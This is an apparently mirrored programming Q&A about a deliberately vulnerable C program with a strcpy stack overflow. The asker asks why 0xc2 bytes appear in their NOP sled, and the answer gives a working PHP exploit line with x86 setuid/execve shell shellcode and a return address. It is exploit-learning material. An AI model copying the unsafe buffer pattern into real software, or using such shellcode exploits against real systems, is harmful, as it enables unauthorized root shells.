英文:
Why is my stack filled with 0xc2 instructions when I passed the 0x90 instruction?
问题
I have a C program to exploit buffer overflow
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
int overflow(char *input) {
char buf[256];
strcpy(buf, input);
return 1;
}
int main(int argc, char *argv[]) {
overflow(argv[1]);
printf("meow =^..^=\n");
return 1;
}
I try to fill my stack with 0x90 instructions. For that, I use the following command and inspect with GDB:
./vuln $(python -c 'print ("\x41" * (272 - 96 - 74 - 4) + "\x90" * 96 + "\x44" * 74 + "\x42" * 4)')
0xffffd1cc: 0x41 0x41 0x41 0x41 0x41 0xc2 0x90 0xc2
0xffffd1d4: 0x90 0xc2 0x90 0xc2 0x90 0xc2 0x90 0xc2
0xffffd1dc: 0x90 0xc2 0x90 0xc2 0x90 0xc2 0x90 0xc2
0xffffd1e4: 0x90 0xc2 0x90 0xc2 0x90 0xc2 0x90 0xc2
0xffffd1ec: 0x90 0xc2 0x90 0xc2 0x90 0xc2 0x90 0xc2
0xffffd1f4: 0x90 0xc2 0x90 0xc2 0x90 0xc2 0x90 0xc2
Is this protection? If so, is there any way to bypass it? If not, what would it be?
Thanks for all the help.
英文:
I have a C program to exploit buffer overflow
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
int overflow(char *input) {
char buf[256];
strcpy(buf, input);
return 1;
}
int main(int argc, char *argv[]) {
overflow(argv[1]);
printf("meow =^..^=\n");
return 1;
}
I try to fill my stack with 0x90 instructions. For that, I use the following command and inspect with GDB:
./vuln $(python -c 'print ("\x41" * (272 - 96 - 74 - 4) + "\x90" * 96 + "\x44" * 74 + "\x42" * 4)')
0xffffd1cc: 0x41 0x41 0x41 0x41 0x41 0xc2 0x90 0xc2
0xffffd1d4: 0x90 0xc2 0x90 0xc2 0x90 0xc2 0x90 0xc2
0xffffd1dc: 0x90 0xc2 0x90 0xc2 0x90 0xc2 0x90 0xc2
0xffffd1e4: 0x90 0xc2 0x90 0xc2 0x90 0xc2 0x90 0xc2
0xffffd1ec: 0x90 0xc2 0x90 0xc2 0x90 0xc2 0x90 0xc2
0xffffd1f4: 0x90 0xc2 0x90 0xc2 0x90 0xc2 0x90 0xc2
As you can see, the stack receives the 0xc2 instruction interspersed with 0x90 (the only one I requested). I believe this comes from some protection, but I'm not sure.
Is this protection? If so, is there any way to bypass it? If not, what would it be?
Thanks for all the help.
答案1
得分: 0
The problem was how Python handled hex, I found an alternative by switching to PHP. Here is the implemented code:
./vuln $(php -r 'echo str_repeat("\x41", 179). str_repeat("\x90", 56) . "\x31\xc0\x31\xdb\xb0\xd5\xcd\x80\x31\xc0\x31\xdb\x31\xc9\x31\xd2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\xb0\x0b\xcd\x80" . "\xc0\xd3\xff\xff";')
英文:
The problem was how Python handled hex, I found an alternative by switching to PHP. Here is the implemented code:
./vuln $(php -r 'echo str_repeat("\x41", 179). str_repeat("\x90", 56) . "\x31\xc0\x31\xdb\xb0\xd5\xcd\x80\x31\xc0\x31\xdb\x31\xc9\x31\xd2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\xb0\x0b\xcd\x80" . "\xc0\xd3\xff\xff";')
通过集体智慧和协作来改善编程学习和解决问题的方式。致力于成为全球开发者共同参与的知识库,让每个人都能够通过互相帮助和分享经验来进步。
评论